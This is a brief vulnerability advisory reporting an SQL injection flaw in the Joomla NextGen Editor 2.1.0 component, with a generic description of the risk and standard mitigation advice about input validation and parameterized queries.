Joomla! Component NextGen Editor 2.1.0 – SQL Injection

The vulnerability allows an attacker to inject sql commands by sending a malicious HTTP request to the vulnerable application. The attacker can execute arbitrary SQL commands on the vulnerable system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should use parameterized queries or stored procedures to prevent SQL injection attacks.
